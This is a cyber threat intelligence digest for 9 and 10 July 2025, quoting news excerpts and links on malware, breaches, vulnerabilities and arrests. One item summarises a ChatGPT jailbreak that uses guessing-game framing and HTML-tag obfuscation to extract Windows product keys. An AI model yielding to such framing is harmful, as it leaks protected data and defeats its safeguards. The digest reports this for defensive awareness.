"Continued research by Darktrace has revealed that cryptocurrency users are being targeted by threat actors in an elaborate social engineering scheme that continues to evolve. In December 2024, Cado Security Labs detailed a campaign targeting Web 3 employees in the Meeten campaign. The campaign included threat actors setting up meeting software companies to trick users into joining meetings and installing the information stealer Realst disguised as video meeting software."
https://www.darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam
https://thehackernews.com/2025/07/fake-gaming-and-ai-firms-push-malware.html - MacOS.ZuRu Resurfaces | Modified Khepri C2 Hides Inside Doctored Termius App
"First noted by a Chinese blogger in July 2021, macOS.ZuRu is a backdoor that was initially delivered through poisoned web results on Baidu. Users searching for the popular Terminal emulator iTerm2 were redirected to a malicious site hosting a trojanized version of the app. Subsequent ZuRu variants used the same model, poisoning Baidu for other popular macOS utilities including SecureCRT, Navicat and Microsoft’s Remote Desktop for Mac. The selection of trojanized apps suggested the malware authors were targeting users of backend tools for SSH and other remote connections utilities."
https://www.sentinelone.com/blog/macos-zuru-resurfaces-modified-khepri-c2-hides-inside-doctored-termius-app/
https://thehackernews.com/2025/07/new-macos-malware-zuru-targeting.html - Threat Actor Activity Related To The Iran Conflict
"In light of the most recent Iranian conflict, Nozomi Networks Labs has observed a 133% increase in cyberattacks coming from well-known Iranian threat actor groups during May and June. From what Nozomi Networks Labs researchers have observed so far, US companies appear to be the primary target as warned in a June 30th Fact Sheet published by CISA and last week’s National Terrorism Advisory System Bulletin from the U.S. Department of Homeland Security."
https://www.nozominetworks.com/blog/threat-actor-activity-related-to-the-iran-conflict
https://therecord.media/iran-state-backed-hackers-industrial-attacks-spring-2025
Breaches/Hacks/Leaks
- McDonald’s AI Hiring Tool McHire Leaked Data Of 64 Million Job Seekers
"A vulnerability in McHire, the AI-powered recruitment platform used by a vast majority of McDonald’s franchisees, exposed the personal information of over 64 million job applicants. The vulnerability, discovered by security researchers Ian Carroll and Sam Curry, allowed unauthorised access to sensitive data, including names, email addresses, phone numbers, and home addresses. The investigation began after reports surfaced on Reddit about the McHire chatbot, named Olivia and developed by Paradox.ai, giving strange responses. Researchers quickly found two critical weaknesses. First, the administration login for restaurant owners on McHire accepted easily guessable default credentials: “123456” for both username and password. This simple entry granted them administrator access to a test restaurant account within the system."
https://hackread.com/mcdonalds-ai-hiring-tool-mchire-leaked-job-seekers-data/
https://www.malwarebytes.com/blog/news/2025/07/mcdonalds-ai-bot-spills-data-on-job-applicants
General News
- What EU’s PQC Roadmap Means On The Ground
"In this Help Net Security interview, David Warburton, Director at F5 Labs, discusses how the EU’s Post-Quantum Cryptography (PQC) roadmap aligns with global efforts and addresses both the technical and regulatory challenges of migrating to PQC. Warburton also outlines practical steps organizations must take to ensure cryptographic agility and long-term data protection."
https://www.helpnetsecurity.com/2025/07/10/david-warburton-f5-labs-eu-pqc-roadmap/ - Fake Online Stores Look Real, Rank High, And Trap Unsuspecting Buyers
"Shopping on a fake online store can lead to more than a bad purchase. It could mean losing money, having your identity stolen, or even getting malware on your device. E-shop scams rose by 790% in the first quarter of 2025 compared to the same period in 2024, according to Avast. Cybercriminals might be exploiting economic uncertainty as rising tariffs push consumers to seek cheaper deals online. This makes it easier to trick people with fake stores."
https://www.helpnetsecurity.com/2025/07/10/tips-online-shopping-scams/ - Global Software Supply Chain Visibility Remains Critically Low
"Only 23% of organizations are confident that they have very high visibility of their software supply chain, according to LevelBlue’s Data Accelerator. The limited visibility reported by organizations significantly impacts their cyber resilience. This Accelerator is an in-depth analysis into data from the 2025 LevelBlue Futures Report, comparing risk appetites, investment gaps, and overall preparedness to help organizations secure their end-to-end software supplier ecosystem. It shows software supply chain security as a growing business concern in 2025. This is partly due to regional regulatory framework demands, and because the attack surface is expanding in response to AI adoption and the integration of complex third-party ecosystems."
https://www.helpnetsecurity.com/2025/07/10/low-global-software-supply-chain-visibility/ - Russian Pro Basketball Player Arrested For Alleged Role In Ransomware Attacks
"Russian professional basketball player Daniil Kasatkin was arrested in France at the request of the United States for allegedly acting as a negotiator for a ransomware gang. Daniil Kasatkin is a Russian basketball player who briefly played NCAA basketball at Penn State before returning to Russia in 2019. In four seasons with MBA-MAI, he appeared in 172 games before he left the team. According to French media, Kasatkin was arrested at Paris's Charles de Gaulle airport on June 21st after landing in France with his fiancée."
https://www.bleepingcomputer.com/news/security/russian-pro-basketball-player-arrested-for-alleged-role-in-ransomware-attacks/
https://cyberscoop.com/russian-basketball-player-daniil-kasatkin-arrested-france-ransomware-charges-penn-state/
https://therecord.media/russian-basketball-player-arrested-in-france-ransomware - Retail Cyber Attacks: NCA Arrest Four For Attacks On M&S, Co-Op And Harrods
"Four people have been arrested in the UK as part of a National Crime Agency investigation into cyber attacks targeting M&S, Co-op and Harrods. Two males aged 19, another aged 17, and a 20-year-old female were apprehended in the West Midlands and London this morning (10 July) on suspicion of Computer Misuse Act offences, blackmail, money laundering and participating in the activities of an organised crime group. All four were arrested at their home addresses and had their electronic devices seized for digital forensic analysis."
https://www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods
https://www.theregister.com/2025/07/10/nca_arrests_four_in_connection/
https://www.bleepingcomputer.com/news/security/four-arrested-in-uk-over-mands-co-op-harrod-cyberattacks/
https://therecord.media/uk-arrests-four-ransomware-ms-harrods-co-op
https://thehackernews.com/2025/07/four-arrested-in-440m-cyber-attack-on.html
https://www.darkreading.com/cyberattacks-data-breaches/4-arrested-uk-marks-spencer-co-op-harrods-hacks
https://www.bankinfosecurity.com/british-police-bust-four-scattered-spider-suspects-in-england-a-28934
https://www.infosecurity-magazine.com/news/four-arrested-uk-retail-attacks/
https://cyberscoop.com/scattered-spider-arrests-uk-nca-marks-and-spencer/
https://hackread.com/uk-arrests-woman-men-cyberattacks-ms-co-op-harrods/
https://www.helpnetsecurity.com/2025/07/10/ms-ransomware-attackers-arrested/
https://www.securityweek.com/four-arrested-in-uk-over-ms-co-op-cyberattacks/
https://securityaffairs.com/179806/cyber-crime/uk-nca-arrested-four-people-over-ms-co-op-cyberattacks.html - Latin America 2025 Mid-Year Cyber Snapshot Reveals 39% Surge In Attacks As AI Threats Escalate Regional Risk
"Latin America is grappling with an elevated rate of cyber attacks in the first half of 2025. Organizations in the region are being targeted by an average of 2,716 attacks per week, which is 39% higher than the global weekly average of 1,955. New insights from Check Point Research reveal an escalating wave of threats, marked by advanced malware, government-linked operations, and vulnerabilities tied to cloud platforms."
https://blog.checkpoint.com/research/latin-america-2025-mid-year-cyber-snapshot-reveals-39-surge-in-attacks-as-ai-threats-escalate-regional-risk/ - Browser Exploits Wane As Users Become The Attack Surface
"Browser exploits continue to haunt enterprise security. In May, Microsoft patched a browser vulnerability that could allow attackers to force Edge users into Internet Explorer compatibility mode, reducing security protections. A year ago, Google patched three vulnerabilities in its Chrome browser — two that could lead to a sandbox escape and one that could allow code execution." - **https://www.darkreading.com/vulnerabilities-threats/browser-exploits-wane-users-become-attack-surface
- Catching Smarter Mice With Even Smarter Cats**
"From the beginning, the antivirus world has been a cat-and-mouse game, where malware authors and antivirus engineers constantly adapt their code to bypass or catch each other. Artificial Intelligence is bringing the game to the next level, with malware authors using AI to improve their malware[1] and anti-virus engineers using AI to assist them with reverse engineering[2]."
https://www.fortinet.com/blog/threat-research/catching-smarter-mice-with-even-smarter-cats - LLMs Fall Short In Vulnerability Discovery And Exploitation
"Large language models (LLMs) are still falling short in performing vulnerability discovery and exploitation tasks. Many threat actors therefore remain skeptical about using AI tools for such roles. This is according to new research by Forescout Research – Vedere Labs, which tested 50 current AI models from commercial, open source and underground sources to evaluate their ability to perform vulnerability research (VR) and exploit development (ED). VR tasks aimed to identify a specific vulnerability in a short code snippet. ED tasks sought to generate a working exploit for a vulnerable binary."
https://www.infosecurity-magazine.com/news/llms-fall-vulnerability-discovery/ - What Can Businesses Do About Ethical Dilemmas Posed By AI?
"Almost every business, whether small or large, now possesses several AI systems that claim to deliver better efficiency, time savings, and quicker decision-making. Through their ability to handle large volumes of data, AI tools minimize trial errors to an absolute minimum, enabling quicker go-to-market. But these transformative benefits are lately being offset by concerns that these intricate, impenetrable machines might be causing more harm to society than benefit to business. Privacy and surveillance, discrimination, and bias top the concern list. Let’s explore the top ethical dilemmas surrounding AI."
https://www.securityweek.com/what-can-businesses-do-about-ethical-dilemmas-posed-by-ai/ - SOC Threat Radar — July 2025
"Over the last month, Barracuda Managed XDR’s security solutions, threat intelligence and SOC analysts identified developments that organizations should be aware of, including: - A 35% rise in infostealer detections
- A 56% rise in threats targeting Linux servers
- A 13% rise in suspicious logins for AWS consoles"
https://blog.barracuda.com/2025/07/10/soc-threat-radar-july-2025 - At Last, a Use Case For AI Agents With Sky-High ROI: Stealing Crypto
"Using AI models to generate exploits for cryptocurrency contract flaws appears to be a promising business model, though not necessarily a legal one. Researchers with University College London (UCL) and the University of Sydney (USYD) in Australia have devised an AI agent that can autonomously discover and exploit vulnerabilities in so-called smart contracts. Smart contracts, which have never lived up to their name, are self-executing programs on various blockchains that carry out decentralized finance (DeFi) transactions when certain conditions are met."
https://www.theregister.com/2025/07/10/ai_agents_automatically_steal_cryptocurrency/
https://arxiv.org/abs/2507.05558
อ้างอิง
Electronic Transactions Development Agency(ETDA) - CISA Releases Thirteen Industrial Control Systems Advisories
-
Cyber Threat Intelligence 10 July 2025
Financial Sector
- June 2025 Security Issues In Korean & Global Financial Sector
"This report comprehensively covers actual cyber threats and security issues related to financial companies in South Korea and abroad. This article includes an analysis of malware and phishing cases distributed to the financial sector, the top 10 malware strains targeting the financial sector, and the industry statistics of leaked Korean accounts on Telegram. A detailed look into the phishing email distribution case targeting the financial sector is also covered."
https://asec.ahnlab.com/en/88936/
Industrial Sector
- ICS Patch Tuesday: Vulnerabilities Addressed By Siemens, Schneider, Phoenix Contact
"July 2025 Patch Tuesday ICS security advisories have been published by Siemens, Schneider Electric and Phoenix Contact. Siemens has released nine new advisories, as well as a security bulletin urging customers to take steps to secure their industrial control systems (ICS) amid an increasing threat to the operational technology (OT) landscape. The alert cites the current geopolitical situation and references a recent US government alert warning organizations about a potential surge in attacks by Iran. The industrial giant also informed customers that its Sentron Powermanager and Desigo CC devices are not affected by a recently disclosed remote code execution vulnerability in Apache Tomcat."
https://www.securityweek.com/ics-patch-tuesday-vulnerabilities-addressed-by-siemens-schneider-phoenix-contact-2/ - Key Findings From The Fortinet 2025 Operational Technology Security Report
"The IT/OT air gap is largely gone. Once isolated OT systems are now deeply interconnected with enterprise IT environments. And as these industrial systems continue to modernize, they have become increasingly vulnerable to threat actors. That reality has put OT cybersecurity squarely on the radar of executives, regulators, and adversaries alike. Fortinet’s 2025 State of Operational Technology and Cybersecurity Report provides a detailed examination of how organizations are addressing the increasing risks faced by today’s OT networks. Based on a global survey of more than 550 OT professionals across manufacturing, energy, transportation, and other critical sectors, the report captures the current state of OT security, including the progress made, the pressure OT teams still face, and the priorities shaping the future of OT environments. This seventh installment of the report includes four years of trending data to identify emerging trends in OT cybersecurity."
https://www.fortinet.com/blog/business-and-technology/key-findings-from-the-fortinet-2025-operational-technology-security-report
New Tooling
- Kanvas: Open-Source Incident Response Case Management Tool
"Kanvas is an open-source incident response case management tool with a simple desktop interface, built in Python. It gives investigators a place to work with SOD (Spreadsheet of Doom) or similar files, so they can handle key tasks without jumping between different programs. “At its core, the tool leverages Excel as the backend. It includes a note-taking features that uses Markdown, allowing investigators to write structured, portable notes. These notes can be easily exported or shared in .md format, ensuring that documentation remains accessible even without the tool,” Jinto Antony, the author of the tool and Senior Investigator, Incident Response at WithSecure, told Help Net Security."
https://www.helpnetsecurity.com/2025/07/09/kanvas-open-source-incident-response-case-management-tool/
https://github.com/WithSecureLabs/Kanvas
Vulnerabilities
- Critical RCE Vulnerability In Mcp-Remote: CVE-2025-6514 Threatens LLM Clients
"The JFrog Security Research team has recently discovered and disclosed CVE-2025-6514 – a critical (CVSS 9.6) security vulnerability in the mcp-remote project – a popular tool used by Model Context Protocol clients. The vulnerability allows attackers to trigger arbitrary OS command execution on the machine running mcp-remote when it initiates a connection to an untrusted MCP server, posing a significant risk to users – a full system compromise. mcp-remote is a proxy that enables Large Language Model (LLM) hosts such as Claude Desktop to communicate with remote MCP servers, even if natively they only support communicating with local MCP servers."
https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/
https://www.bankinfosecurity.com/serious-flaws-patched-in-model-context-protocol-tools-a-28924 - Ivanti, Fortinet, Splunk Release Security Updates
"Ivanti, Fortinet, and Splunk on Tuesday announced patches for dozens of vulnerabilities across their product portfolios, including critical- and high-severity flaws. Security updates released for Ivanti Connect Secure (ICS) and Policy Secure (IPS), Endpoint Manager Mobile (EPMM), and Endpoint Manager (EPM) resolve a total of 11 bugs that require authentication to be exploited. The EPM update resolves three high-severity defects that could allow attackers to decrypt other users’ passwords or read arbitrary data from the database, while the EPMM refresh fixes two high-severity OS command injection flaws leading to remote code execution."
https://www.securityweek.com/ivanti-fortinet-splunk-release-security-updates/ - Ruckus Virtual SmartZone (vSZ) And Ruckus Network Director (RND) Contain Multiple Vulnerabilities
"Multiple vulnerabilities have been identified in Ruckus Wireless management products, specifically Virtual SmartZone (vSZ) and Network Director (RND), including authentication bypass, hardcoded secrets, arbitrary file read by authenticated users, and unauthenticated remote code execution. These issues may allow full compromise of the environments managed by the affected software. At this time, we have not able to reach Ruckus Wireless or their parent company to include their response to these disclosed vulnerabilities, we recommend using these products only within isolated management networks accessible to trusted users."
https://kb.cert.org/vuls/id/613753
https://www.bleepingcomputer.com/news/security/ruckus-networks-leaves-severe-flaws-unpatched-in-management-devices/
https://www.securityweek.com/unpatched-ruckus-vulnerabilities-allow-wireless-environment-hacking/ - Count(er) Strike – Data Inference Vulnerability In ServiceNow
"Varonis Threat Labs discovered a high-severity vulnerability in ServiceNow’s platform that could lead to significant data exposure and exfiltration, including PII, credentials, and other sensitive information. ServiceNow is a widely used platform with 85% of its customer base being in the Fortune 500. Our researchers were able to exploit the record count UI element on list pages, using enumeration techniques and query filters to infer and expose sensitive data from various tables within ServiceNow."
https://www.varonis.com/blog/counter-strike-servicenow
https://www.bleepingcomputer.com/news/security/new-servicenow-flaw-lets-attackers-enumerate-restricted-data/ - An NVIDIA Container Bug & Chance To Harden Kubernetes
"A once-dangerous NVIDIA Container Toolkit vulnerability showcases how to harden Kubernetes clusters against container escape. On Aug. 6 at Black Hat USA in Las Vegas, researchers from Wiz will host the session "Breaking Out of The AI Cage: Pwning AI Providers with NVIDIA Vulnerabilities." The talk expands on research the vendor published last September dedicated to CVE-2024-0132, a NVIDIA Container Toolkit time-of-check to time-of-use (TOCTOU) vulnerability that would have enabled container escapes for AI and cloud providers that use the popular open source component."
https://www.darkreading.com/cloud-security/nvidia-container-bug-harden-kubernetes - AMD Warns Of New Meltdown, Spectre-Like Bugs Affecting CPUs
"AMD is warning users of a newly discovered form of side-channel attack affecting a broad range of its chips that could lead to information disclosure. Akin to Meltdown and Spectre, the Transient Scheduler Attack (TSA) comprises four vulnerabilities that AMD said it discovered while looking into a Microsoft report about microarchitectural leaks. The four bugs do not appear too venomous at face value – two have medium-severity ratings while the other two are rated "low." However, the low-level nature of the exploit's impact has nonetheless led Trend Micro and CrowdStrike to assess the threat as "critical.""
https://www.theregister.com/2025/07/09/amd_tsa_side_channel/
https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7029.html
Malware
- June 2025 Malware Spotlight: Discord Exploits Lead To Rising Threats
"Cyber criminals continue to innovate, with a recent innovation involving the hijacking of expired Discord vanity invite links to silently deliver malicious payloads. This new campaign, discovered by Check Point Research, delivers AsyncRAT, now ranked number 3 among Top Malware for June. Using trusted platforms such as GitHub, Bitbucket, and Discord for payload delivery and data exfiltration, the attackers have devised an advanced multi-stage malware delivery system, including ClickFix phishing tactics and ChromeKatz to bypass encryption mechanisms. These developments underscore the ever-evolving nature of cyber threats, with SafePay remaining a top ransomware threat and the education sector continuing to face significant risks."
https://blog.checkpoint.com/research/june-2025-malware-spotlight-discord-exploits-lead-to-rising-threats/ - New AI Malware PoC Reliably Evades Microsoft Defender
"A soon-to-be-released security evasion tool will help red teamers and hackers consistently bypass Microsoft Defender for Endpoint. Since November 2023, doomsayers have foretold of a future where large language models (LLMs) would help hackers develop malware more quickly, at scale, with capabilities beyond what humans could probably design on their own. That future hasn't quite materialized yet; hackers thus far have used artificial intelligence (AI) to generate simple malware and phishing content, and to aid in supplementary tasks like target research."
https://www.darkreading.com/endpoint-security/ai-malware-poc-evades-microsoft-defender
From Click To Compromise: Unveiling The Sophisticated Attack Of DoNot APT Group On Southern European * * Government Entities
"The DoNot APT group, also identified by various security vendors as APT-C-35, Mint Tempest, Origami Elephant, SECTOR02, and Viceroy Tiger, has been active since at least 2016, and has been attributed by several vendors to have links to India. The global cybersecurity landscape is continually challenged by state-sponsored threat actors conducting espionage operations. The DoNot APT group (also known as APT-C-35), is believed to operate with a focus on South Asian geopolitical interests. This threat group typically targets government entities, foreign ministries, defense organizations, and NGOs especially those in South Asia and Europe."
https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/
https://thehackernews.com/2025/07/donot-apt-expands-operations-targets.html
https://securityaffairs.com/179774/apt/donot-apt-is-expanding-scope-targeting-european-foreign-ministries.html - Fake CNN And BBC Sites Used To Push Investment Scams
"Cybercriminals are faking popular news websites such as CNN, BBC and CNBC to trick people into investing in fraudulent cryptocurrency schemes, according to a new report. Researchers at Bahrain-based cybersecurity firm CTM360 said they identified more than 17,000 such sites, which publish fake stories featuring prominent public figures, including national leaders and central bank governors. The articles falsely linked those figures to “fabricated investment schemes in order to build trust and get engagement from victims,” the researchers said."
https://therecord.media/news-websites-faked-to-spread-investment-scams
Breaches/Hacks/Leaks
- Qantas Confirms Data Breach Impacts 5.7 Million Customers
"Australian airline Qantas has confirmed that 5.7 million people have been impacted by a recent data breach, in which threat actors stole customers' data. On July 1st, Qantas disclosed that it had detected a cyberattack the previous day on a third-party platform used by a Qantas airline contact centre. While the company did not share any further details, BleepingComputer learned that the attack shared similarities with other attacks on the aviation industry linked to threat actors classified as Scattered Spider."
https://www.bleepingcomputer.com/news/security/qantas-confirms-data-breach-impacts-57-million-customers/
https://www.theregister.com/2025/07/09/qantas_begins_telling_customers_data/ - Bitcoin Depot Breach Exposes Data Of Nearly 27,000 Crypto Users
"Bitcoin Depot, an operator of Bitcoin ATMs, is notifying customers of a data breach incident that has exposed their sensitive information. In the letter sent to affected individuals, the company informs that it first detected suspicious activity on its network last year on June 23. Although the internal investigation was completed on July 18, 2024, a parallel investigation by federal agencies dictated that public disclosure of the incident should be withheld until it was completed."
https://www.bleepingcomputer.com/news/security/bitcoin-depot-breach-exposes-data-of-nearly-27-000-crypto-users/
https://therecord.media/bitcoin-depot-cryptocurrency-atm-company-data-breach - PII, ID Numbers, & SSNs Exposed In Tax Credit Consultancy Data Breach
"Cybersecurity researcher Jeremiah Fowler discovered and reported to vpnMentor an unencrypted and non-password-protected database that contained 245,949 records. The database, which presumably belonged to a tax credit consulting agency, held PII, driver’s licenses, military discharge forms, documents containing Social Security numbers (SSNs), and other internal, potentially sensitive information."
https://www.vpnmentor.com/news/report-rockerbox-breach/
https://hackread.com/rockerbox-server-tax-firm-exposed-sensitive-records/ - More Than $40 Million Stolen From GMX Crypto Platform
"Decentralized exchange GMX said more than $40 million worth of cryptocurrency was stolen during an incident on Wednesday morning. GMX, which allows users to purchase and speculate on many different cryptocurrencies, published a statement on social media saying the company “experienced an exploit” and is conducting an investigation on how it occurred. GMX added that its platform had previously undergone “numerous audits from top security specialists.” Several blockchain security companies confirmed the theft, tracking about $43 million in user funds exiting the platform. Trading on the platform has been disabled."
https://therecord.media/gmx-exchange-cryptocurrency-stolen - Nippon Steel Subsidiary Blames Data Breach On Zero-Day Attack
"Japan-based Nippon Steel Solutions on Tuesday disclosed a data breach that resulted from the exploitation of a zero-day vulnerability. Nippon Steel Solutions, also called NS Solutions, offers cloud, cybersecurity and other IT solutions. The company is a subsidiary of Japanese steel giant Nippon Steel, which recently acquired US Steel in a controversial deal. Nippon Steel Solutions said in a statement posted on its Japanese-language website that it detected suspicious activity on some servers on March 7."
https://www.securityweek.com/nippon-steel-subsidiary-blames-data-breach-on-zero-day-attack/
https://securityaffairs.com/179766/data-breach/nippon-steel-solutions-data-breach.html
General News
- June 2025 Trend Report On The Deep Web & Dark Web
"The June 2025 trend report on the Deep Web & Dark Web is composed of the following topics: Ransomware, Data Breach, DarkWeb, CyberAttack, and Threat Actor. Please note that some of the information in the report may not be verifiable."
https://asec.ahnlab.com/en/88933/ - Why Your Security Team Feels Stuck
"Cybersecurity friction usually gets framed as a user problem: password policies that frustrate employees, MFA that slows down logins, or blocked apps that send workers into the arms of shadow IT. But there’s a different kind of friction happening behind the scenes, and it’s hitting security teams themselves. It shows up during incident response, threat hunting, and day-to-day tasks. It’s the drag of too many tools, rigid approval chains, and a lack of clarity about who owns what. The irony is hard to ignore. In the name of securing the organization, security teams can end up slowed down by their own systems."
https://www.helpnetsecurity.com/2025/07/09/why-cybersecurity-friction/ - Know Your Enemy: Understanding Dark Market Dynamics
"In popular culture, content providers portray the Dark Web as a sinister, unorganized Internet forum run by shadowy figures in hoodies. By all accounts, it is a hub of illegal activity. Reports show that 56.8% of content found on the Dark Web is illegal, 20% of global drug sales occur on Dark Web markets, and 60% of Dark Web marketplaces focus on cybercrime-related activities."
https://www.darkreading.com/vulnerabilities-threats/understanding-dark-market-dynamics - Chatgpt Guessing Game Leads To Users Extracting Free Windows OS Keys & More
"In a recent submission last year, researchers discovered a method to bypass AI guardrails designed to prevent sharing of sensitive or harmful information. The technique leverages the game mechanics of language models, such as GPT-4o and GPT-4o-mini, by framing the interaction as a harmless guessing game. By cleverly obscuring details using HTML tags and positioning the request as part of the game’s conclusion, the AI inadvertently returned valid Windows product keys. This case underscores the challenges of reinforcing AI models against sophisticated social engineering and manipulation tactics."
https://0din.ai/blog/chatgpt-guessing-game-leads-to-users-extracting-free-windows-os-keys-more
https://www.theregister.com/2025/07/09/chatgpt_jailbreak_windows_keys/
อ้างอิง
Electronic Transactions Development Agency(ETDA) - June 2025 Security Issues In Korean & Global Financial Sector
-
Cyber Threat Intelligence 09 July 2025
Industrial Sector
- Emerson ValveLink Products
"Successful exploitation of these vulnerabilities could allow an attacker with access to the system to read sensitive information stored in cleartext, tamper with parameters, and run un-authorized code."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-189-01
Vulnerabilities
- Adobe Patches Critical Code Execution Bugs
"Adobe on Tuesday announced the rollout of security fixes for 58 vulnerabilities across 13 products, including three critical-severity flaws in Adobe Connect, ColdFusion, and Experience Manager Forms (AEM Forms) on JEE. The most severe of these bugs is CVE-2025-49533 (CVSS score of 9.8), a deserialization of untrusted data in AEM Forms on JEE that could lead to arbitrary code execution. Although it says it is not aware of any exploits in the wild targeting the security defect, Adobe marked the patch as priority 1, urging users to update to AEM Forms on JEE version 6.5.0.0.20250527.0."
https://www.securityweek.com/adobe-patches-critical-code-execution-bugs/ - SAP Patches Critical Flaws That Could Allow Remote Code Execution, Full System Takeover
"Enterprise software maker SAP on Tuesday announced the release of 27 new and four updated security notes as part of its July 2025 Security Patch Day, including six that address critical vulnerabilities. At the top of the list is an update for a note released in May, which addresses five security defects in its Supplier Relationship Management (SRM). SAP initially marked the note as high-priority, based on the severity score of the most important of these bugs. Now, it has updated the rating to ‘critical’, upon learning that the impact of one of these issues is much higher than initially determined."
https://www.securityweek.com/sap-patches-critical-flaws-that-could-allow-remote-code-execution-full-system-takeover/ - Microsoft July 2025 Patch Tuesday Fixes One Zero-Day, 137 Flaws
"Today is Microsoft's July 2025 Patch Tuesday, which includes security updates for 137 flaws, including one publicly disclosed zero-day vulnerability in Microsoft SQL Server. This Patch Tuesday also fixes fourteen "Critical" vulnerabilities, ten of which are remote code execution vulnerabilities, one is an information disclosure, and two are AMD side channel attack flaws."
https://www.bleepingcomputer.com/news/microsoft/microsoft-july-2025-patch-tuesday-fixes-one-zero-day-137-flaws/
https://www.darkreading.com/application-security/microsoft-patches-137-cves-no-zero-days
https://blog.talosintelligence.com/microsoft-patch-tuesday-july-2025/
https://cyberscoop.com/microsoft-patch-tuesday-july-2025/
https://www.securityweek.com/microsoft-patches-130-vulnerabilities-for-july-2025-patch-tuesday/
https://securityaffairs.com/179738/security/microsoft-patch-tuesday-security-updates-for-july-2025-fixed-a-zero-day.html
https://www.theregister.com/2025/07/08/microsoft_patch_tuesday/
Malware
- New Android TapTrap Attack Fools Users With Invisible UI Trick
"A novel tapjacking technique can exploit user interface animations to bypass Android's permission system and allow access to sensitive data or trick users into performing destructive actions, such as wiping the device. Unlike traditional, overlay-based tapjacking, TapTrap attacks work even with zero-permission apps to launch a harmless transparent activity on top of a malicious one, a behavior that remains unmitigated in Android 15 and 16. TapTrap was developed by a team of security researchers at TU Wien and the University of Bayreuth (Philipp Beer, Marco Squarcina, Sebastian Roth, Martina Lindorfer), and will be presented next month at the USENIX Security Symposium."
https://www.bleepingcomputer.com/news/security/new-android-taptrap-attack-fools-users-with-invisible-ui-trick/
https://taptrap.click/usenix25_taptrap_paper.pdf - Anatsa Targets North America; Uses Proven Mobile Campaign Process
"ThreatFabric researchers have identified a new campaign involving the Anatsa Android banking trojan, which is now targeting users in North America. This marks at least the third instance of Anatsa focusing its operations on mobile banking customers in the United States and Canada. As with previous campaigns, Anatsa is being distributed via the official Google Play Store."
https://www.threatfabric.com/blogs/anatsa-targets-north-america-uses-proven-mobile-campaign-process
https://thehackernews.com/2025/07/anatsa-android-banking-trojan-hits.html
https://www.bleepingcomputer.com/news/security/android-malware-anatsa-infiltrates-google-play-to-target-us-banks/
https://therecord.media/anatsa-android-banking-malware-returns-north-america - How a Hybrid Mesh Architecture Disrupts The Attack Chain (Part Two)
"In Part 1 we covered the basics and how a fragmented approach can have a higher MTTD and MTTR. In part two we highlight five critical ways a hybrid mesh approach uniquely disrupts the ransomware lifecycle."
https://blog.checkpoint.com/security/how-a-hybrid-mesh-architecture-disrupts-the-attack-chain-part-two/ - CoinMiner Attacks Exploiting GeoServer Vulnerability
"AhnLab SEcurity intelligence Center (ASEC) has confirmed that the unpatched GeoServer is still under continuous attack. Threat actors are scanning for vulnerable GeoServer and installing CoinMiner. ASEC has also identified cases of infection in South Korea."
https://asec.ahnlab.com/en/88917/ - Phishing Attack : Deploying Malware On Indian Defense BOSS Linux
"CYFIRMA has identified a sophisticated cyber-espionage campaign orchestrated by APT36 (also known as Transparent Tribe), a threat actor based in Pakistan. This campaign specifically targets personnel within the Indian defense sector. In a notable shift from previous methodologies, APT36 has adapted its tactics to focus on Linux-based environments, with a particular emphasis on systems running BOSS Linux, a distribution extensively utilized by Indian government agencies."
https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/
https://hackread.com/pakistan-transparent-tribe-indian-defence-linux-malware/ - Approach To Mainframe Penetration Testing On z/OS. Deep Dive Into RACF
"In our previous article we dissected penetration testing techniques for IBM z/OS mainframes protected by the Resource Access Control Facility (RACF) security package. In this second part of our research, we delve deeper into RACF by examining its decision-making logic, database structure, and the interactions between the various entities in this subsystem. To facilitate offline analysis of the RACF database, we have developed our own utility, racfudit, which we will use to perform possible checks and evaluate RACF configuration security. As part of this research, we also outline the relationships between RACF entities (users, resources, and data sets) to identify potential privilege escalation paths for z/OS users."
https://securelist.com/zos-mainframe-pentesting-resource-access-control-facility/116873/ - Malicious Pull Request Infects VS Code Extension
"In the last few months, ReversingLabs (RL) researchers have encountered multiple malicious packages that target cryptocurrency users and developers. In May, RL researcher Karlo Zanki wrote a blog about malicious PyPI packages that targets developers in the Solana ecosystem. Another RL researcher, Lucija Valentić, wrote about malicious npm packages that steal crypto funds from wallets by injecting code into local, legitimate packages. Those are notable incidents."
https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension
https://thehackernews.com/2025/07/malicious-pull-request-infects-6000.html - BaitTrap: Over 17,000 Fake News Websites Caught Fueling Investment Fraud Globally
"A newly released report by cybersecurity firm CTM360 reveals a large-scale scam operation utilizing fake news websites—known as Baiting News Sites (BNS)—to deceive users into online investment fraud across 50 countries. These BNS pages are made to look like real news outlets: CNN, BBC, CNBC, or regional media. They publish fake stories that feature public figures, central banks, or financial brands, all claiming to back new ways to earn passive income. The goal? Build trust quickly and steer readers toward professional-looking scam platforms like Trap10, Solara Vynex, or Eclipse Earn."
https://thehackernews.com/2025/07/baittrap-over-17000-fake-news-websites.html
https://www.ctm360.com/reports/baittrap-rise-of-baiting-news-sites - GoldMelody’s Hidden Chords: Initial Access Broker In-Memory IIS Modules Revealed
"Unit 42 researchers uncovered a campaign by an initial access broker (IAB) to exploit leaked Machine Keys — cryptographic keys used on ASP.NET sites — to gain access to targeted organizations. IABs breach organizations and then sell that access to other threat actors. This report analyzes the tools used in these attacks. We track this actor as the temporary group TGR-CRI-0045. The group seems to follow an opportunistic approach but has attacked organizations in Europe and the U.S. in the following industries: financial services, manufacturing, wholesale and retail, high technology, and transportation and logistics."
https://unit42.paloaltonetworks.com/initial-access-broker-exploits-leaked-machine-keys/
Breaches/Hacks/Leaks
- M&S Confirms Social Engineering Led To Massive Ransomware Attack
"M&S confirmed today that the retail outlet's network was initially breached in a "sophisticated impersonation attack" that ultimately led to a DragonForce ransomware attack. M&S chairman Archie Norman revealed this in a hearing with the UK Parliament's Business and Trade Sub-Committee on Economic Security regarding the recent attacks on the retail sector in the country. While Norman did not go into details, he stated that the threat actors impersonated one of the 50,000 people working with the company to trick a third-party entity into resetting an employee's password."
